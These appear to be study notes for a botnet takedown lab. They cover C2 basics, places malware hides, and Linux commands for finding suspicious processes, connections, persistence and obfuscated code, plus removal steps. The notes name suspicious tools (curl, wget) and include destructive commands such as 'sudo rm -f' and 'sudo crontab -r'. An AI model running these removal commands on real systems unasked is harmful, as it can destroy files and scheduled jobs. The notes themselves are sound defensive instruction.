1. Botnet Takedown Challenge
- Investigate the infected machine, identify IOCs (Indicators of Compromise), find the malware or script, determine how it works, and neutralize the botnet connection.
2. Botnet?
- A botnet is a network of infected computers (bots) controlled by a central attacker (botmaster).
- These bots may receive commands via C2, IRC servers, Web requests, Reverse Shells
3. What is a C2 (Command & Control)?
- A C2 server is what the malware connects back to
- like HQ for the bots
4. Files and Directories to Investigate
- /tmp/, /var/tmp/, /dev/shm/ : often used to malware to store payloads
- /etc/cron* : persistent scheduled execution
- ~/.bashrc, ~/.profile : startup scripts
- /etc/systemd/system/ : malicious services may be installed
5. Path
1) Detect the Bot
(1) ps aux
Lists all running processes on the system in a snapshot view.
static snapshot
- a : show processes for all users, not just you
- u : show user/owner of the process
- x : show processes not attached to a terminal (like background daemons or malware)
(2) top
Shows live, real-time process activity -like Task Manager in terminal form
Great for spotting malware using lots of CPU or RAM.
Live performance info
top- q : quit
- k : kill a process (enter PID)
- P : sort by CPU
- M : sort by memory
(3) netstat -tulnp
Shows network connections and listening ports
- t : TCP connections only
- u : UDP connections only
- l : show listening ports (services waiting for connections)
- n : show numeric IPs/ports (instead of resolving names)
- p : show the PID/program name using the port
sudo netstat -tulnp(4) ss -tulnp
A faster, modern alternative to netstat
(5) sudo lsof -i
LiSt all Open Files that are network-related
- I : internet-related files. It show any process that is connected to an IP address, is listening on a port, is using TCP or UDP
sudo lsof -i
- Look for weird external IPs, strange ports like 1337, 6667, 8080, etc.
2) Find the Malware File
ls -lah /tmp /var/tmp /dev/shm- a : show hidden files
- h : human-readable sizes
(1) Find hidden files (.*) anywhere on the system
find / -type f -iname ".*" 2>/dev/null(2) Find recent files modified in the last 60 minutes
find / -type f -mmin -60 2>/dev/null
- you can use this to catch recently dropped payloads
(3) use file to see if it's a script or ELF binary
- ELF : Executable and Linkable Format. The standard binary format for linux executables
- If you see an unknown file is ELF, it's likely a compiled executable (possibly malicious)
Python script -> readable and easy to analyze
ELF 64-bit executable -> compiled malware (harder, needs strings, Ghidra, etc.)
3) Analyze the Malware
- If it's a script:
cat suspicious.sh
- If it's an ELF binary:
strings suspicious_elf | less
Check if it contains:
- C2 IP or domain
- commands like curl, wget, rm, chmod, etc.
- Python or bash code that loops or connects outward
4) Check for Obfuscation or Encoding
If you see things like:
exec(base64.b64decode("aW1wb3J0IG9zCg=="))It's obfuscated.
(1) Decode Base64 in terminal
echo "aW1wb3J0IG9zCg==" | base64 -d
4) Trace Persistence
(1) check crontab
crontab -l
cat /etc/crontab
ls -l /etc/cron.*/*- l : Lists the cron jobs for the current user
(2) Check systems
systemctl list-units --type=service | grep suspicious(3) Look at user .bashrc or .profile
- .bashrc : A hidden config file in a user's home directory. It runs every time you open a terminal.
cat ~/.bashrc
5) Take It Down
Once you find the malware and know how it connects
(1) Kill the process
sudo kill -9 <pid>(2) Delete the file
sudo rm -f /tmp/bot.sh(3) Remove from persistence
- r : Deletes all cron jobs for the current user
sudo crontab -r
